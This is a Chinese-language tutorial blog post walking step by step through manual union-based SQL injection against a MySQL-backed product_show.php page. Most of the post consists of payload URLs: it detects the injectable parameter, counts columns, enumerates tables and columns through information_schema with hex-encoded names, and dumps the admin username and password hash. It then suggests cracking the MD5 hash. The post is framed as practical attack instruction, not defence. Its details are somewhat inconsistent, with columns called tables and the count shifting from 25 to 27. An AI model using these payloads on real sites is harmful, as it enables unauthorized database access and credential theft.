实战mysql手工注入

1.判断注入点是否存在:

  • url + ‘
  • url + “
  • url + and 1=1 和 url and 1=2
图片[1]-Mysql手工注入实例 详细教程-极乐资源网

2.判断数据库列数 order by:

25是正常显示页面

图片[2]-Mysql手工注入实例 详细教程-极乐资源网

26则报错

图片[3]-Mysql手工注入实例 详细教程-极乐资源网
由此可以判断改数据库一共有25个表

3.爆出显位:

url + union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 –+

图片[4]-Mysql手工注入实例 详细教程-极乐资源网

可以看到 2 和10 这边显示了

4.参数查询:

  • User() 查询当前数据库用户
  • Version() 查询当前数据库版本
  • Database() 查询当前页面所连接的数据库名称
  • @@Version_compile_os 查询服务器的系统版本

url + union select 1,user(),3,4,5,6,7,8,9,Database(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 –+

图片[5]-Mysql手工注入实例 详细教程-极乐资源网

可以看到下面显示了数据库用户名和数据库名

5、查表名

Mysql数据库中有一个 information_schema 数据库,里面存放了mysql 下所有数据库中的列名和表名信息。就不用像Access数据库那样去猜,有时候还猜不到。

Mysql数据库中有一个 information_schema 数据库,里面存放了mysql 下所有数据库中的列名和表名信息。就不用像Access数据库那样去猜,有时候还猜不到。

http://www.xxxxx.com/product_show.php?id=-21 UNION SELECT1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27from information_schema.tableswhere table_schema=sq_wqyh150528

注意:这里需要把数据库名称“sq_wqyh150528”做一个16进制编码。可以用小葵多功能转换工具;

http://www.xxxxx.com/product_show.php?id=-21 UNION SELECT1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27from information_schema.tableswhere table_schema=73715F77717968313530353238

从这里,可以得到“sq_wqyh150528”数据库里面有很多张表,例如:admin,articles,config_navs,contact等等表。

6、查列名

http://www.xxxxx.com/product_show.php?id=-21 UNION SELECT1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27from information_schema.columnswhere table_name=admin

注意,这里的表“admin”也要做一个16进制编码,我这就不转了,为了让大家看清楚。

在这里,我们可以得到以下列名,例如:id,name,adminpass,groupid,content等其它列名。

7、查数据

mysql查数据有点类似于access的联合查询法查数据。

http://www.xxxxx.com/product_show.php?id=-21 UNION SELECT1,name,3,adminpass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27fromadmin

得到了:

用户名:admin

密码:17433b011807e2db950737747752349

很明显,密码是加密过的,然后需要破解,例如:md5破解;

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论